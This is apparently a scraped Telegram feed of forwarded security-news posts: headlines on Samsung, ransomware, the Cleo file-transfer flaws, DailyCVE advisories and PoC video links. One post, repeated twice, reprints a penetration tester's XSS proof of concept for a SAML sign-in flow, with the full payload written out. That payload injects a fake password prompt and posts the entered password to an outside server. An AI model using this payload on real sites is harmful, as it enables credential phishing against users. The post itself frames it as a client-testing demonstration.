Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
One UI 70 Beta: A First Look at #Samsung's Latest
https://undercodenews.com/one-ui-70-beta-a-first-look-at-samsungs-latest/
@Undercode_News
https://undercodenews.com/one-ui-70-beta-a-first-look-at-samsungs-latest/
@Undercode_News
UNDERCODE NEWS
One UI 70 Beta: A First Look at Samsung's Latest - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Bridging Cultures: A Lakota Educator's Journey in STEM
https://undercodenews.com/bridging-cultures-a-lakota-educators-journey-in-stem/
@Undercode_News
https://undercodenews.com/bridging-cultures-a-lakota-educators-journey-in-stem/
@Undercode_News
UNDERCODE NEWS
Bridging Cultures: A Lakota Educator's Journey in STEM - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from DailyCVE
🟠 D-Tale, Remote Code Execution, #CVE-XXXX (Moderate)
https://dailycve.com/d-tale-remote-code-execution-cve-xxxx-moderate/
@DailyCVE
https://dailycve.com/d-tale-remote-code-execution-cve-xxxx-moderate/
@DailyCVE
DailyCVE
D-Tale, Remote Code Execution, CVE-XXXX (Moderate) - DailyCVE
2024-12-13 : This article details a moderate-severity vulnerability in D-Tale, a Python library for interactive data exploration. The vulnerability allows […]
Forwarded from DailyCVE
🔴 FHIR/Ucum-#java, XXE Vulnerability, #CVE-XXXX-XXXX (Critical)
https://dailycve.com/fhir-ucum-java-xxe-vulnerability-cve-xxxx-xxxx-critical/
@Daily_CVE
https://dailycve.com/fhir-ucum-java-xxe-vulnerability-cve-xxxx-xxxx-critical/
@Daily_CVE
DailyCVE
FHIR/Ucum-java, XXE Vulnerability, CVE-XXXX-XXXX (Critical) - DailyCVE
2024-12-13 : The FHIR/Ucum-java library has a critical XXE (XML External Entity) vulnerability. This allows attackers to potentially access sensitive […]
Forwarded from DailyCVE
🔴 Browsershot, Local File Inclusion, #CVE-XXXX-XXXX (High)
https://dailycve.com/browsershot-local-file-inclusion-cve-xxxx-xxxx-high/
@Daily_CVE
https://dailycve.com/browsershot-local-file-inclusion-cve-xxxx-xxxx-high/
@Daily_CVE
DailyCVE
Browsershot, Local File Inclusion, CVE-XXXX-XXXX (High) - DailyCVE
2024-12-13 : This article details a high-severity vulnerability (CVE-XXXX-XXXX) affecting versions of the PHP package `spatie/browsershot` prior to 5.0.1. The […]
Forwarded from DailyCVE
🔴 phpMyFAQ, Unrestricted File Download (#CVE-TBD) - Critical
https://dailycve.com/phpmyfaq-unrestricted-file-download-cve-tbd-critical/
@Daily_CVE
https://dailycve.com/phpmyfaq-unrestricted-file-download-cve-tbd-critical/
@Daily_CVE
DailyCVE
phpMyFAQ, Unrestricted File Download (CVE-TBD) - Critical - DailyCVE
2024-12-13 Platform: phpMyFAQ Version: All versions before 3.2.10 Vulnerability: Unrestricted File Download Severity: Critical Date: Unknown What Undercode Says: This […]
Forwarded from DailyCVE
🔴 Cleo Harmony, VLTrader, LexiCom Unrestricted File Upload and Download (#CVE-XXXX-XXXX) (Critical)
https://dailycve.com/cleo-harmony-vltrader-lexicom-unrestricted-file-upload-and-download-cve-xxxx-xxxx-critical/
@Daily_CVE
https://dailycve.com/cleo-harmony-vltrader-lexicom-unrestricted-file-upload-and-download-cve-xxxx-xxxx-critical/
@Daily_CVE
DailyCVE
Cleo Harmony, VLTrader, LexiCom Unrestricted File Upload and Download (CVE-XXXX-XXXX) (Critical) - DailyCVE
2024-12-13 : This article discusses a critical vulnerability (CVE-XXXX-XXXX) affecting Cleo Harmony, VLTrader, and LexiCom versions prior to 5.8.0.21. The […]
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
🦑How run the Password Reset Flaw | Live PoC - New method
Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚠️ German Authorities Neutralize BadBox #Malware Affecting 30,000 Devices
https://undercodenews.com/german-authorities-neutralize-badbox-malware-affecting-30000-devices/
@Undercode_News
https://undercodenews.com/german-authorities-neutralize-badbox-malware-affecting-30000-devices/
@Undercode_News
UNDERCODE NEWS
German Authorities Neutralize BadBox Malware Affecting 30,000 Devices - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🚨 Critical Cleo File Transfer #Software Flaw Exploited in #Ransomware Attacks
https://undercodenews.com/critical-cleo-file-transfer-software-flaw-exploited-in-ransomware-attacks/
@Undercode_News
https://undercodenews.com/critical-cleo-file-transfer-software-flaw-exploited-in-ransomware-attacks/
@Undercode_News
UNDERCODE NEWS
Critical Cleo File Transfer Software Flaw Exploited in Ransomware Attacks - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Big Screen, Big Value: #Samsung #Galaxy Tab S9 FE+ Review - Perfect for Family Fun
https://undercodenews.com/big-screen-big-value-samsung-galaxy-tab-s9-fe-review-perfect-for-family-fun/
@Undercode_News
https://undercodenews.com/big-screen-big-value-samsung-galaxy-tab-s9-fe-review-perfect-for-family-fun/
@Undercode_News
UNDERCODE NEWS
Big Screen, Big Value: Samsung Galaxy Tab S9 FE+ Review - Perfect for Family Fun - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔐 Stealing the Secret Sauce: How Hackers Can Extract #AI Models
https://undercodenews.com/stealing-the-secret-sauce-how-hackers-can-extract-ai-models/
@Undercode_News
https://undercodenews.com/stealing-the-secret-sauce-how-hackers-can-extract-ai-models/
@Undercode_News
UNDERCODE NEWS
Stealing the Secret Sauce: How Hackers Can Extract AI Models - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE TESTING
Media is too big
VIEW IN TELEGRAM
🦑 The Official NASA CSRF Vulnerability Video
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔐 Password Spray Attacks Targeting Citrix Netscaler on the Rise
https://undercodenews.com/password-spray-attacks-targeting-citrix-netscaler-on-the-rise/
@Undercode_News
https://undercodenews.com/password-spray-attacks-targeting-citrix-netscaler-on-the-rise/
@Undercode_News
UNDERCODE NEWS
Password Spray Attacks Targeting Citrix Netscaler on the Rise - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Leveling Up Our XSS Proof of Concepts at CybaVerse :
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.
Here’s a snippet of the payload I crafted:
⚠️ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> ⚠️
The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.
Here’s a snippet of the payload I crafted:
⚠️ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> ⚠️
The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🚨 Cleo Zero-Day Exploits: A Growing #Ransomware Threat
https://undercodenews.com/cleo-zero-day-exploits-a-growing-ransomware-threat/
@Undercode_News
https://undercodenews.com/cleo-zero-day-exploits-a-growing-ransomware-threat/
@Undercode_News
UNDERCODE NEWS
Cleo Zero-Day Exploits: A Growing Ransomware Threat - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Versa Strengthens SASE with Integrated Endpoint DLP
https://undercodenews.com/versa-strengthens-sase-with-integrated-endpoint-dlp/
@Undercode_News
https://undercodenews.com/versa-strengthens-sase-with-integrated-endpoint-dlp/
@Undercode_News
UNDERCODE NEWS
Versa Strengthens SASE with Integrated Endpoint DLP - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🌐 Enhanced Cyber Resilience with Zerto Cloud Vault
https://undercodenews.com/enhanced-cyber-resilience-with-zerto-cloud-vault/
@Undercode_News
https://undercodenews.com/enhanced-cyber-resilience-with-zerto-cloud-vault/
@Undercode_News
UNDERCODE NEWS
Enhanced Cyber Resilience with Zerto Cloud Vault - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🎮 Streamlining Issue Management with Enhanced #GitHub Issues
https://undercodenews.com/streamlining-issue-management-with-enhanced-github-issues/
@Undercode_News
https://undercodenews.com/streamlining-issue-management-with-enhanced-github-issues/
@Undercode_News
UNDERCODE NEWS
Streamlining Issue Management with Enhanced GitHub Issues - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…